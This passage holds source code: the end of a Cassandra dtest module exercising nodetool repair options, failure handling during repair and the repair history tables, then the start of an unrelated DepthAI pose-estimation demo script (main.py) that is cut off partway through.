node2 = cluster.nodes["node2"] logger.debug("starting repair...") opts = ["-local"] opts += _repair_options(self.cluster.version(), ks="ks") node1.repair(opts) # Verify that only nodes in dc1 are involved in repair out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 1, "Lines matching: {}".format(len(out_of_sync_logs)) line, m = out_of_sync_logs[0] num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), 
{m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) valid_out_of_sync_pairs = {node1.address(), node2.address()} assert out_of_sync_nodes == valid_out_of_sync_pairs, "Unrelated node found in local repair: {}, expected {}".format(out_of_sync_nodes, valid_out_of_sync_pairs) # Check node2 now has the key self.check_rows_on_node(node2, 2001, found=[1000], restart=False) def test_dc_repair(self): """ * Set up a multi DC cluster * Perform a -dc repair on two DCs * Assert only nodes in those DCs were repaired """ cluster = self._setup_multi_dc() node1 = cluster.nodes["node1"] node2 = cluster.nodes["node2"] node3 = cluster.nodes["node3"] logger.debug("starting repair...") opts = ["-dc", "dc1", "-dc", "dc2"] opts += _repair_options(self.cluster.version(), ks="ks") node1.repair(opts) # Verify that only nodes in dc1 and dc2 are involved in repair out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]) valid_out_of_sync_pairs = [{node1.address(), node2.address()}, {node2.address(), node3.address()}] for line, m in out_of_sync_logs: num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) assert out_of_sync_nodes in valid_out_of_sync_pairs, str(out_of_sync_nodes) # Check node2 now has the key self.check_rows_on_node(node2, 2001, found=[1000], restart=False) def test_dc_parallel_repair(self): """ * Set up a multi DC cluster * Perform a -dc repair on two DCs, with -dcpar * Assert only nodes in those DCs were repaired """ cluster = self._setup_multi_dc() node1 = cluster.nodes["node1"] node2 = cluster.nodes["node2"] node3 = cluster.nodes["node3"] logger.debug("starting repair...") opts = ["-dc", "dc1", "-dc", "dc2", "-dcpar"] opts += _repair_options(self.cluster.version(), ks="ks", sequential=False) node1.repair(opts) # Verify that only nodes in dc1 and dc2 are involved in repair out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]) valid_out_of_sync_pairs = [{node1.address(), node2.address()}, {node2.address(), node3.address()}] for line, m in out_of_sync_logs: num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) assert out_of_sync_nodes in valid_out_of_sync_pairs, str(out_of_sync_nodes) # Check node2 now has the key self.check_rows_on_node(node2, 2001, found=[1000], restart=False) # Check the repair was a dc parallel repair if self.cluster.version() >= '2.2': assert len(node1.grep_log('parallelism: dc_parallel')) == 1, str(node1.grep_log('parallelism')) else: assert len(node1.grep_log('parallelism=PARALLEL')) == 1, str(node1.grep_log('parallelism')) def _setup_multi_dc(self): """ Sets up 3 DCs (2 nodes in 'dc1', and one each in 'dc2' and 'dc3'). After setup, node2 in dc1 lacks some data and needs to be repaired.
""" cluster = self.cluster # Disable hinted handoff and set batch commit log so this doesn't # interfer with the test (this must be after the populate) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") # populate 2 nodes in dc1, and one node each in dc2 and dc3 cluster.populate([2, 1, 1]).start() node1, node2, node3, node4 = cluster.nodelist() session = self.patient_cql_connection(node1) session.execute("CREATE KEYSPACE ks WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 2, 'dc2': 1, 'dc3':1}") session.execute("USE ks") if cluster.version() < '4.0': create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'}) else: create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}) # Insert 1000 keys, kill node 2, insert 1 key, restart node 2, insert 1000 more keys logger.debug("Inserting data...") insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL) node2.flush() node2.stop(wait_other_notice=True) insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.THREE) node2.start(wait_for_binary_proto=True) node1.watch_log_for_alive(node2) insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL) cluster.flush() # Verify that only node2 has only 2000 keys and others have 2001 keys logger.debug("Checking data...") self.check_rows_on_node(node2, 2000, missings=[1000]) for node in [node1, node3, node4]: self.check_rows_on_node(node, 2001, found=[1000]) return cluster @since('2.2') def parallel_table_repair_noleak(self): """ @jira_ticket CASSANDRA-11215 Tests that multiple parallel repairs on the same table isn't causing reference leaks. """ self.fixture_dtest_setup.ignore_log_patterns = [ "Cannot start multiple repair sessions over the same sstables", # The message we are expecting "Validation failed in", # Expecting validation to fail "RMI Runtime", # JMX Repair failures "Session completed with the following error", # The nodetool repair error "ValidationExecutor", # Errors by the validation executor "RepairJobTask" # Errors by the repair job task ] cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([3]).start() node1, node2, node3 = cluster.nodelist() node1.stress(stress_options=['write', 'n=10k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50']) # Start multiple repairs in parallel threads = [] for i in range(3): t = threading.Thread(target=node1.nodetool, args=("repair keyspace1 standard1",)) threads.append(t) t.start() # Wait for the repairs to finish for t in threads: t.join() found_message = False # All nodes should reject multiple repairs and have no reference leaks for node in cluster.nodelist(): if len(node.grep_log("Cannot start multiple repair sessions over the same sstables")) > 0: found_message = True break assert found_message @pytest.mark.no_vnodes def test_token_range_repair(self): """ Test repair using the -st and -et options * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1 * Verify that nodes 1 and 2, and only nodes 1+2, are repaired """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() self._parameterized_range_repair(repair_opts=['-st', 
str(node3.initial_token), '-et', str(node1.initial_token)]) @pytest.mark.no_vnodes def test_token_range_repair_with_cf(self): """ @jira_ticket CASSANDRA-11866 Test repair using the -st, -et, and -cf options * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1 on the wrong cf * Verify that the data did not get repaired * Issue a repair on a range that belongs to the right cf * Verify that the data was repaired """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() # Insert data, kill node 2, insert more data, restart node 2, insert another set of data logger.debug("Inserting data...") node1.stress(['write', 'n=1k', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30']) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K']) node2.start(wait_for_binary_proto=True) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K']) cluster.flush() # Repair only the range node 1 owns on the wrong CF, assert everything is still broken opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='counter1', sequential=False) node1.repair(opts) assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent." assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair." out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 0, "We repaired the wrong CF, so things should still be broken" # Repair only the range node 1 owns on the right CF, assert everything is fixed opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent." assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair."
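# After repairing the correct CF over the same token range, the out-of-sync log line should appear and name exactly the node1/node2 pair (checked below).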
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) _, matches = out_of_sync_logs[0] out_of_sync_nodes = {matches.group(1), matches.group(2)} valid_out_of_sync_pairs = [{node1.address(), node2.address()}] assert out_of_sync_nodes in valid_out_of_sync_pairs, str(out_of_sync_nodes) @pytest.mark.no_vnodes def test_partitioner_range_repair(self): """ Test repair using the -pr option * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1 * Verify that nodes 1 and 2, and only nodes 1+2, are repaired """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() self._parameterized_range_repair(repair_opts=['-pr']) @since('3.10') @pytest.mark.no_vnodes def test_pull_repair(self): """ Test repair using the --pull option @jira_ticket CASSANDRA-9876 * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a pull repair on a range that only belongs to node1 * Verify that nodes 1 and 2, and only nodes 1+2, are repaired * Verify that node1 only received data * Verify that node2 only sent data """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node1_address = node1.network_interfaces['binary'][0] node2_address = node2.network_interfaces['binary'][0] self._parameterized_range_repair(repair_opts=['--pull', '--in-hosts', node1_address + ',' + node2_address, '-st', str(node3.initial_token), '-et', str(node1.initial_token)]) # Node 1 should only receive files (as we ran a pull repair on node1) assert len(node1.grep_log("Receiving [1-9][0-9]* files")) > 0 assert len(node1.grep_log("sending [1-9][0-9]* files")) == 0 assert len(node1.grep_log("sending 0 files")) > 0 # Node 2 should only send files (as we ran a pull repair on node1) assert len(node2.grep_log("Receiving [1-9][0-9]* files")) == 0 assert len(node2.grep_log("Receiving 0 files")) > 0 assert len(node2.grep_log("sending [1-9][0-9]* files")) > 0 @since('4.0') def test_non_replicated_ks_repair(self): cluster = self.cluster cluster.populate([2, 2]).start(wait_for_binary_proto=True) self.fixture_dtest_setup.ignore_log_patterns.extend(["no neighbors to repair with", "keyspace is skipped since repair was called with --skip-empty"]) _, _, node, _ = cluster.nodelist() session = self.patient_cql_connection(node) create_ks(session, "repair1", {'dc1': 2, 'dc2': 0}) create_ks(session, "repair2", {'dc1': 2, 'dc2': 2}) session.execute("create table repair1.t1 (id int primary key, i int)") session.cluster.control_connection.wait_for_schema_agreement(wait_time=120) session.execute("create table repair2.t2 (id int primary key, i int)") session.cluster.control_connection.wait_for_schema_agreement(wait_time=120) session.execute("insert into repair1.t1 (id, i) values (1, 1)") session.execute("insert into repair2.t2 (id, i) values (2, 2)") node.nodetool("repair --ignore-unreplicated-keyspaces -st 0 -et 1") assert len(node.grep_log("t2 is fully synced")) > 0 assert len(node.grep_log("in repair1 - unreplicated keyspace is ignored since repair was
called with --ignore-unreplicated-keyspaces")) > 0 try: self.fixture_dtest_setup.ignore_log_patterns.append("Nothing to repair for .+ in repair1") node.nodetool("repair -st 0 -et 1") assert False, "repair should fail" except ToolError: logger.debug("got expected exception during repair") @since('4.0') @pytest.mark.no_vnodes def test_multiple_ranges_repair(self): cluster = self.cluster cluster.populate([3]) node1, node2, node3 = cluster.nodelist() cluster.start(wait_for_binary_proto=True) self.fixture_dtest_setup.ignore_log_patterns.extend(["Nothing to repair for"]) session = self.patient_cql_connection(node1) create_ks(session, "repair1", {'dc1': 2}) session.execute("create table repair1.t1 (id int primary key, i int)") session.cluster.control_connection.wait_for_schema_agreement(wait_time=120) session.execute("insert into repair1.t1 (id, i) values (1, 1)") with JolokiaAgent(node1) as jmx: repair_mbean = make_mbean('db', 'StorageService') # 0,1 is replicated, -3074457345618258606:-3074457345618258605 is not: jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)', ["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605"}]) node1.watch_log_for("Nothing to repair for \(-3074457345618258606,-3074457345618258605\] in repair1 - aborting") assert len(node1.grep_log("fully synced")) == 0 jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)', ["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605", "ignoreUnreplicatedKeyspaces": "true"}]) node1.watch_log_for("Found no neighbors for range \(-3074457345618258606,-3074457345618258605\] for repair1 - ignoring since repairing with --ignore-unreplicated-keyspaces") node1.watch_log_for("t1 is fully synced") def _parameterized_range_repair(self, repair_opts): """ @param repair_opts A list of strings which represent cli args to nodetool repair * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1, using repair_opts * Verify that nodes 1 and 2, and only nodes 1+2, are repaired """ cluster = self.cluster node1, node2, node3 = cluster.nodelist() # Insert data, kill node 2, insert more data, restart node 2, insert another set of data logger.debug("Inserting data...") node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30']) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K']) node2.start(wait_for_binary_proto=True) node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K']) cluster.flush() # Repair only the range node 1 owns opts = repair_opts opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent." assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair." 
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) _, matches = out_of_sync_logs[0] out_of_sync_nodes = {matches.group(1), matches.group(2)} valid_out_of_sync_pairs = [{node1.address(), node2.address()}] assert out_of_sync_nodes in valid_out_of_sync_pairs, str(out_of_sync_nodes) @since('2.2') def test_trace_repair(self): """ * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on node1, setting job threads to 2 and with tracing enabled * Check the trace data was written, and that the right job thread count was used """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() logger.debug("Inserting data...") node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30']) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K']) node2.start(wait_for_binary_proto=True) cluster.flush() job_thread_count = '2' opts = ['-tr', '-j', job_thread_count] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) time.sleep(5)  # Give the trace table some time to populate session = self.patient_cql_connection(node1) rows = list(session.execute("SELECT activity FROM system_traces.events")) # This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is # the repair task triggered in the test. assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \ 'Expected {} job threads in repair options.
Instead we saw {}'.format(job_thread_count, rows[0][0]) @since('2.2') def test_thread_count_repair(self): """ * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on to node1, setting job threads * Check the right job thread count was used * Repeat steps 2 through 5 with all job count options """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() # Valid job thread counts: 1, 2, 3, and 4 for job_thread_count in range(1, 5): logger.debug("Inserting data...") node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count - 1), 2 * job_thread_count)]) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count), 2 * (job_thread_count + 1))]) node2.start(wait_for_binary_proto=True) cluster.flush() session = self.patient_cql_connection(node1) session.execute("TRUNCATE system_traces.events") opts = ['-tr', '-j', str(job_thread_count)] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) time.sleep(5) # Give the trace table some time to populate rows = list(session.execute("SELECT activity FROM system_traces.events")) # This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is # the repair task triggered in the test. assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \ 'Expected {} job threads in repair options. 
Instead we saw {}'.format(job_thread_count, rows[0][0]) @pytest.mark.no_vnodes def test_multiple_concurrent_repairs(self): """ @jira_ticket CASSANDRA-11451 Make sure we can run sub range repairs in parallel - and verify that we actually do repair """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=1M', 'no-warmup', '-schema', 'replication(factor=3)', '-rate', 'threads=30']) node2.start(wait_for_binary_proto=True) t1 = threading.Thread(target=node1.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node3.initial_token), str(node1.initial_token)),)) t2 = threading.Thread(target=node2.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node1.initial_token), str(node2.initial_token)),)) t3 = threading.Thread(target=node3.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node2.initial_token), str(node3.initial_token)),)) t1.start() t2.start() t3.start() t1.join() t2.join() t3.join() node1.stop(wait_other_notice=True) node3.stop(wait_other_notice=True) _, _, rc = node2.stress(['read', 'n=1M', 'no-warmup', '-rate', 'threads=30'], whitelist=True) assert rc == 0 @since('4.0') def test_wide_row_repair(self): """ @jira_ticket CASSANDRA-13899 Make sure compressed vs uncompressed blocks are handled correctly when stream decompressing """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.populate(2).start() node1, node2 = cluster.nodelist() node2.stop(wait_other_notice=True) profile_path = os.path.join(os.getcwd(), 'stress_profiles/repair_wide_rows.yaml') logger.info(("yaml = " + profile_path)) node1.stress(['user', 'profile=' + profile_path, 'n=50', 'ops(insert=1)', 'no-warmup', '-rate', 'threads=8', '-insert', 'visits=FIXED(100K)', 'revisit=FIXED(100K)']) node2.start(wait_for_binary_proto=True) node2.repair() @since('2.1', max_version='4') def test_dead_coordinator(self): """ @jira_ticket CASSANDRA-11824 Make sure parent repair session is cleared out if the repair coordinator dies """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node1.stress(['write', 'n=100k', '-schema', 'replication(factor=3)', '-rate', 'threads=30']) def run_repair(): try: if cluster.version() >= "2.2": node1.repair() else: node1.nodetool('repair keyspace1 standard1 -inc -par') except ToolError: logger.debug("got expected exception during repair, ignoring") t1 = threading.Thread(target=run_repair) t1.start() if cluster.version() > "2.2": node2.watch_log_for('Validating ValidationRequest', filename='debug.log') else: node1.watch_log_for('requesting merkle trees', filename='system.log') time.sleep(2) logger.debug("stopping node1") node1.stop(gently=False, wait_other_notice=True) t1.join() logger.debug("starting node1 - first repair should have failed") node1.start(wait_for_binary_proto=True) logger.debug("running second repair") if cluster.version() >= "2.2": node1.repair() else: node1.nodetool('repair keyspace1 standard1 -inc -par') @since('2.2') def test_dead_sync_initiator(self): """ @jira_ticket CASSANDRA-12901 """ self._test_failure_during_repair(phase='sync', initiator=True) @since('2.2') def test_dead_sync_participant(self): """ @jira_ticket CASSANDRA-12901 """ 
self._test_failure_during_repair(phase='sync', initiator=False) @since('2.2', max_version='4') def test_failure_during_anticompaction(self): """ @jira_ticket CASSANDRA-12901 """ self._test_failure_during_repair(phase='anticompaction') @since('2.2') def test_failure_during_validation(self): """ @jira_ticket CASSANDRA-12901 """ self._test_failure_during_repair(phase='validation') def _test_failure_during_repair(self, phase, initiator=False): cluster = self.cluster # We are not interested in specific errors, but # that the repair session finishes on node failure without hanging self.fixture_dtest_setup.ignore_log_patterns = [ "Endpoint .* died", "Streaming error occurred", "StreamReceiveTask", "Stream failed", "Session completed with the following error", "Repair session .* for range .* failed with error", "Sync failed between .* and .*", "failed to send a stream message/file to peer", "failed to send a stream message/data to peer" ] # stream session will be closed upon EOF, see CASSANDRA-15666 if cluster.version() >= '4.0': self.fixture_dtest_setup.ignore_log_patterns.append("Socket closed before session completion") self.fixture_dtest_setup.ignore_log_patterns.append("is finished with state FAILED") self.fixture_dtest_setup.ignore_log_patterns.append("stream has been closed") self.fixture_dtest_setup.ignore_log_patterns.append("stream operation from .* failed") # Disable hinted handoff and set batch commit log so this doesn't # interfere with the test (this must be after the populate) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Setting up cluster..") cluster.populate(3) node1, node2, node3 = cluster.nodelist() node_to_kill = node2 if (phase == 'sync' and initiator) else node3 logger.debug("Setting up byteman on {}".format(node_to_kill.name)) # set up byteman node_to_kill.byteman_port = '8100' node_to_kill.import_config_files() logger.debug("Starting cluster..") cluster.start(jvm_args=['-Djdk.attach.allowAttachSelf=true']) logger.debug("stopping node3") node3.stop(gently=False, wait_other_notice=True) self.patient_exclusive_cql_connection(node1) logger.debug("inserting data while node3 is down") node1.stress(stress_options=['write', 'n=1k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=10']) logger.debug("bring back node3") node3.start(wait_for_binary_proto=True) if phase == 'sync': script = 'stream_sleep.btm' else: script = 'repair_{}_sleep.btm'.format(phase) if phase == 'validation': prefix = '4.0' if cluster.version() >= '4.0' else 'pre4.0' script = prefix + '/' + script logger.debug("Submitting byteman script to {}".format(node_to_kill.name)) # Sleep on anticompaction/stream so there is time for the node to be killed node_to_kill.byteman_submit(['./byteman/{}'.format(script)]) def node1_repair(): global nodetool_error try: node1.nodetool('repair keyspace1 standard1') except Exception as e: nodetool_error = e logger.debug("repair node1") # Launch in an external thread so it does not hang the process t = Thread(target=node1_repair) t.start() logger.debug("Will kill {} in middle of {}".format(node_to_kill.name, phase)) msg_to_wait = 'streaming plan for Repair' if phase == 'anticompaction': msg_to_wait = 'Got anticompaction request' elif phase == 'validation': msg_to_wait = 'Validating' node_to_kill.watch_log_for(msg_to_wait, filename='debug.log') node_to_kill.stop(gently=False, wait_other_notice=True) logger.debug("Killed {}, now waiting for repair to finish".format(node_to_kill.name)) t.join(timeout=60) assert not t.is_alive(), 'Repair
still running after sync {} was killed'\ .format("initiator" if initiator else "participant") if cluster.version() < '4.0' or phase != 'sync': # the log entry we're watching for in the sync task came from the # anti compaction at the end of the repair, which has been removed in 4.0 node1.watch_log_for('Endpoint .* died', timeout=60) node1.watch_log_for('Repair command .* finished', timeout=60) RepairTableContents = namedtuple('RepairTableContents', ['parent_repair_history', 'repair_history']) @since('2.2') @pytest.mark.resource_intensive class TestRepairDataSystemTable(Tester): """ @jira_ticket CASSANDRA-5839 Tests the `system_distributed.parent_repair_history` and `system_distributed.repair_history` tables by writing thousands of records to a cluster, then ensuring these tables are in valid states before and after running repair. """ @pytest.fixture(scope='function', autouse=True) def fixture_set_cluster_settings(self, fixture_dtest_setup): """ Prepares a cluster for tests of the repair history tables by starting a 5-node cluster, then inserting 5000 values with RF=3. """ self.cluster = fixture_dtest_setup.cluster self.cluster.populate(5).start() self.node1 = self.cluster.nodelist()[0] self.session = fixture_dtest_setup.patient_cql_connection(self.node1) self.node1.stress(stress_options=['write', 'n=5K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)']) fixture_dtest_setup.cluster.flush() def repair_table_contents(self, node, include_system_keyspaces=True): """ @param node the node to connect to and query @param include_system_keyspaces if truthy, return repair information about all keyspaces. If falsey, filter out keyspaces whose name contains 'system' Return a `RepairTableContents` `namedtuple` containing the rows in `node`'s `system_distributed.parent_repair_history` and `system_distributed.repair_history` tables. If `include_system_keyspaces`, include all results. If not `include_system_keyspaces`, filter out repair information about system keyspaces, or at least keyspaces with 'system' in their names. """ session = self.patient_cql_connection(node) def execute_with_all(stmt): return session.execute(SimpleStatement(stmt, consistency_level=ConsistencyLevel.ALL)) parent_repair_history = execute_with_all('SELECT * FROM system_distributed.parent_repair_history;') repair_history = execute_with_all('SELECT * FROM system_distributed.repair_history;') if not include_system_keyspaces: parent_repair_history = [row for row in parent_repair_history if 'system' not in row.keyspace_name] repair_history = [row for row in repair_history if 'system' not in row.keyspace_name] return RepairTableContents(parent_repair_history=parent_repair_history, repair_history=repair_history) @pytest.mark.skip(reason='hangs CI') def test_initial_empty_repair_tables(self): logger.debug('repair tables:') logger.debug(self.repair_table_contents(node=self.node1, include_system_keyspaces=False)) repair_tables_dict = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)._asdict() for table_name, table_contents in list(repair_tables_dict.items()): assert not table_contents, '{} is non-empty'.format(table_name) def test_repair_parent_table(self): """ Test that `system_distributed.parent_repair_history` is properly populated after repair by: - running repair on `node` and - checking that there are a non-zero number of entries in `parent_repair_history`. 
""" self.node1.repair() parent_repair_history, _ = self.repair_table_contents(node=self.node1, include_system_keyspaces=False) assert len(parent_repair_history) def test_repair_table(self): """ Test that `system_distributed.repair_history` is properly populated after repair by: - running repair on `node` and - checking that there are a non-zero number of entries in `repair_history`. """ self.node1.repair() _, repair_history = self.repair_table_contents(node=self.node1, include_system_keyspaces=False) assert len(repair_history)
main.py
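# DepthAI demo: runs the human-pose-estimation-0001 network against either the device RGB camera (-cam) or a video file (-vid), decodes the heatmaps/PAFs in a worker thread, and draws the resulting skeletons.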
import argparse import threading import time from pathlib import Path from pose import getKeypoints, getValidPairs, getPersonwiseKeypoints import cv2 import depthai as dai import numpy as np from imutils.video import FPS parser = argparse.ArgumentParser() parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output") parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)") parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)") args = parser.parse_args() if not args.camera and not args.video: raise RuntimeError("No source selected. Please use either \"-cam\" to use RGB camera as a source or \"-vid <path>\" to run on video") debug = not args.no_debug def cos_dist(a, b): return np.dot(a, b)/(np.linalg.norm(a)*np.linalg.norm(b)) def to_tensor_result(packet): return { tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims) for tensor in packet.getRaw().tensors } def frame_norm(frame, bbox): return (np.clip(np.array(bbox), 0, 1) * np.array([*frame.shape[:2], *frame.shape[:2]])[::-1]).astype(int) def to_planar(arr: np.ndarray, shape: tuple) -> list: return cv2.resize(arr, shape).transpose(2,0,1).flatten() def create_pipeline(): print("Creating pipeline...") pipeline = dai.Pipeline() if args.camera: # ColorCamera print("Creating Color Camera...") cam = pipeline.createColorCamera() cam.setPreviewSize(456, 256) cam.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P) cam.setInterleaved(False) cam.setBoardSocket(dai.CameraBoardSocket.RGB) cam_xout = pipeline.createXLinkOut() cam_xout.setStreamName("cam_out") cam.preview.link(cam_xout.input) controlIn = pipeline.createXLinkIn() controlIn.setStreamName('control') controlIn.out.link(cam.inputControl) # NeuralNetwork print("Creating Human Pose Estimation Neural Network...") pose_nn = pipeline.createNeuralNetwork() if args.camera: pose_nn.setBlobPath(str(Path("models/human-pose-estimation-0001_openvino_2021.2_6shave.blob").resolve().absolute())) else: pose_nn.setBlobPath(str(Path("models/human-pose-estimation-0001_openvino_2021.2_8shave.blob").resolve().absolute())) # Increase threads for detection pose_nn.setNumInferenceThreads(2) # Specify that network takes latest arriving frame in non-blocking manner pose_nn.input.setQueueSize(1) pose_nn.input.setBlocking(False) pose_nn_xout = pipeline.createXLinkOut() pose_nn_xout.setStreamName("pose_nn") pose_nn.out.link(pose_nn_xout.input) if args.camera: cam.preview.link(pose_nn.input) else: pose_in = pipeline.createXLinkIn() pose_in.setStreamName("pose_in") pose_in.out.link(pose_nn.input) print("Pipeline created.") return pipeline colors = [[0, 100, 255], [0, 100, 255], [0, 255, 255], [0, 100, 255], [0, 255, 255], [0, 100, 255], [0, 255, 0], [255, 200, 100], [255, 0, 255], [0, 255, 